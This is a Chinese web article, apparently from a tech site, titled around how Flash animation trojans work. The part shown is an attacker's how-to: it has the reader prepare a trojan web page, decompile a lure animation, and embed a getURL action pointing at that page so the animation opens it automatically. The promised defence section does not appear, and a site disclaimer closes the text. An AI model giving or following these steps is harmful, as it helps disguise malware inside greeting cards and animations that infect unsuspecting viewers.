在网站上观看Flash动画,接收到“好友”发来的一张Flash贺卡,甚至于一个QQ魔法表情,一不留神就中了一个木马!Flash动画木马可以说是无处不在,攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理,想知道攻击者是如何在SWF中插入木马的呢?我们应该怎么样来防范Flash木马呢?
一、制作Flash动画木马的准备
Flash动画木马的原理,是在网页中显示或本地直接播放Flash动画木马时,让Flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。
另外,我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”,以及Flash动画反编译工具“闪客精灵”,编辑工具Macromedia Flash MX。
二、最原始的Flash木马
现在虽然有了许多各种各样的Flash动画木马制作工具,但是为了了解Flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个Flash木马。
步骤一:反编译SWF动画
首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件”→“快速打开”命令,指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令,将动画导出为“MM热舞.fla”文件。
步骤二:插入网页木马代码
然后运行Flash动画编辑器Macromedia Flash MX,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的“getURL”命令,在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”,在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。
版权与免责声明
1、本站所发布的文章仅供技术交流参考,本站不主张将其做为决策的依据,浏览者可自愿选择采信与否,本站不对因采信这些信息所产生的任何问题负责。
2、本站部分文章来源于网络,其版权为原权利人所有。由于来源之故,有的文章未能获得作者姓名,署“未知”或“佚名”。对于这些文章,有知悉作者姓名的请告知本站,以便及时署名。如果作者要求删除,我们将予以删除。除此之外本站不再承担其它责任。
3、本站部分文章来源于本站原创,本站拥有所有权利。
4、如对本站发布的信息有异议,请联系我们,经本站确认后,将在三个工作日内做出修改或删除处理。
请参阅权责声明!